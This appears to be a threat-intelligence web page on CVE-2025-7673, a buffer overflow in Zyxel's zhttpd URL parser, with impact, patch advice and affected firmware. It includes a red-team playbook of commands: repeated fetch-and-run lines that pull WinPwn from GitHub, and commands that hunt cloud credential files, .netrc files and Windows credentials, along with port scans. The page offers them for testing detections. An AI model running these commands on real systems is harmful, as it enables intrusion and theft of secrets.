CVE-2025-7673
Overview
This vulnerability is a buffer overflow caused by improper handling of input length within the URL parser component of the zhttpd web server in Zyxel VMG8825-T50K firmware. The flaw arises from insufficient bounds checking when processing specially crafted HTTP requests, leading to memory corruption. The affected component is the URL parsing routine embedded in the zhttpd service of the firmware versions prior to V5.50(ABOM.5)C0.
Vulnerability Description
A buffer overflow vulnerability in the URL parser of the zhttpd web server in Zyxel VMG8825-T50K firmware versions prior to V5.50(ABOM.5)C0 could allow an unauthenticated attacker to cause denial-of-service (DoS) conditions and potentially execute arbitrary code by sending a specially crafted HTTP request.
Impact
An unauthenticated attacker with network access to the affected device can exploit this vulnerability to cause denial-of-service by crashing the zhttpd service or potentially execute arbitrary code with system-level privileges. No user interaction or authentication is required, as indicated by the CVSS vector (AV:N/AC:L/PR:N/UI:N). Successful exploitation could lead to full device compromise, enabling persistent control or disruption of network services reliant on the affected Zyxel firmware devices.
Solution
Zyxel has released firmware version V5.50(ABOM.5)C0 to address this vulnerability in the VMG8825-T50K and related models. Users should upgrade to this version or later as detailed in the Zyxel security advisory available at https://www.zyxel.com/service-provider/global/en/zyxel-security-advisory-remote-code-execution-and-denial-service-vulnerabilities-cpe. The advisory provides step-by-step instructions for applying the patch and recommends immediate deployment to mitigate exploitation risks.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical buffer overflow vulnerability exists within the URL parser of the zhttpd web server used in various Zyxel firmware versions. This flaw arises from improper handling of input data, specifically when processing HTTP requests. When an attacker sends a specially crafted request, it can lead to memory corruption, allowing the attacker to overwrite the memory space of the application. This overflow can potentially enable the execution of arbitrary code, leading to unauthorized access and control over the affected device. The severity of this vulnerability is underscored by its high CVSS score, indicating a significant risk to systems utilizing the impacted firmware.
Attack vectors for this vulnerability are particularly concerning due to the unauthenticated nature of the exploitation. An attacker can initiate a denial-of-service (DoS) attack simply by sending a malicious HTTP request to the vulnerable web server. This could result in the server becoming unresponsive, disrupting services for legitimate users. Moreover, if the attacker successfully executes arbitrary code, they could gain full control over the device, allowing for further exploitation of the network it resides in. Such scenarios could lead to data breaches, unauthorized surveillance, or even the establishment of a foothold for further attacks within an organization’s infrastructure.
The real-world impact of this vulnerability can be profound, particularly for organizations relying on the affected Zyxel devices for their networking needs. The potential for service disruption can lead to significant operational downtime, affecting productivity and customer trust. Additionally, the ability to execute arbitrary code could facilitate lateral movement within a network, increasing the risk of data theft or further compromise. Businesses may face reputational damage, regulatory fines, and financial losses due to the fallout from such an incident, making it imperative for organizations to prioritize the remediation of this vulnerability.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating firmware to the latest versions that address known vulnerabilities is crucial. Network monitoring tools can be employed to detect unusual traffic patterns indicative of exploitation attempts, such as repeated malformed HTTP requests. Additionally, employing intrusion detection systems (IDS) can help identify and block malicious activities targeting the web server. Organizations should also consider implementing web application firewalls (WAF) to filter and monitor HTTP requests, providing an additional layer of security against potential exploitation.
In conclusion, the buffer overflow vulnerability in the URL parser of the zhttpd web server poses a significant risk to the integrity and availability of affected Zyxel devices. The potential for denial-of-service attacks and arbitrary code execution highlights the urgent need for organizations to assess their exposure and take proactive measures to mitigate the risks associated with this vulnerability. By prioritizing timely updates, employing robust monitoring solutions, and enhancing their security posture, organizations can better protect themselves against the threats posed by this and similar vulnerabilities.
CSURFACE threat intelligence has detected a moderate increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2025-7673, reflecting a growing likelihood of exploitation attempts in the near term. Although no new exploit techniques or proof-of-concept code have surfaced, the upward trend in EPSS—now elevated by over 30%—indicates heightened attacker interest or improved feasibility of leveraging this buffer overflow vulnerability. Our telemetry shows a gradual rise in related scanning and probing activity, suggesting that threat actors are increasingly prioritizing this vector for potential denial-of-service or remote code execution attacks. While the overall exploit landscape remains stable without confirmed active exploitation campaigns, the increased EPSS score signals an elevated risk posture for defenders. This shift underscores the importance of maintaining vigilance around affected Zyxel VMG8825-T50K devices, as the vulnerability’s critical severity combined with growing exploitation potential could soon translate into more frequent or sophisticated attack attempts.
Affected Products (26)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Zyxel | Emg3525-T50b Firmware | All |
cpe:2.3:o:zyxel:emg3525-t50b_firmware:*:*:*:*:emea:*:*:*
|
|
|
Zyxel | Emg3525-T50b Firmware | All |
cpe:2.3:o:zyxel:emg3525-t50b_firmware:*:*:*:*:america:*:*:*
|
|
|
Zyxel | Emg5523-T50b Firmware | All |
cpe:2.3:o:zyxel:emg5523-t50b_firmware:*:*:*:*:emea:*:*:*
|
|
|
Zyxel | Emg5523-T50b Firmware | All |
cpe:2.3:o:zyxel:emg5523-t50b_firmware:*:*:*:*:america:*:*:*
|
|
|
Zyxel | Emg5723-T50k Firmware | All |
cpe:2.3:o:zyxel:emg5723-t50k_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Emg6726-B10a Firmware | All |
cpe:2.3:o:zyxel:emg6726-b10a_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Ex3510-B0 Firmware | All |
cpe:2.3:o:zyxel:ex3510-b0_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Ex5510-B0 Firmware | All |
cpe:2.3:o:zyxel:ex5510-b0_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg1312-T20b Firmware | All |
cpe:2.3:o:zyxel:vmg1312-t20b_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg3625-T50b Firmware | All |
cpe:2.3:o:zyxel:vmg3625-t50b_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg3925-B10b Firmware | All |
cpe:2.3:o:zyxel:vmg3925-b10b_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg3925-B10c Firmware | All |
cpe:2.3:o:zyxel:vmg3925-b10c_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg3927-B50a Firmware | All |
cpe:2.3:o:zyxel:vmg3927-b50a_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg3927-B60a Firmware | All |
cpe:2.3:o:zyxel:vmg3927-b60a_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg3927-B50b Firmware | All |
cpe:2.3:o:zyxel:vmg3927-b50b_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg3927-T50k Firmware | All |
cpe:2.3:o:zyxel:vmg3927-t50k_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg4005-B50b Firmware | All |
cpe:2.3:o:zyxel:vmg4005-b50b_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg4927-B50a Firmware | All |
cpe:2.3:o:zyxel:vmg4927-b50a_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg8623-T50b Firmware | All |
cpe:2.3:o:zyxel:vmg8623-t50b_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg8825-B50a Firmware | All |
cpe:2.3:o:zyxel:vmg8825-b50a_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-7673 |
| zyxel.com |
GitHub CVE
vendor-advisory
|
https://www.zyxel.com/service-provider/global/en/zyxel-security-advisory-remote-code-execution-and-denial-service-vulnerabilities-cpe |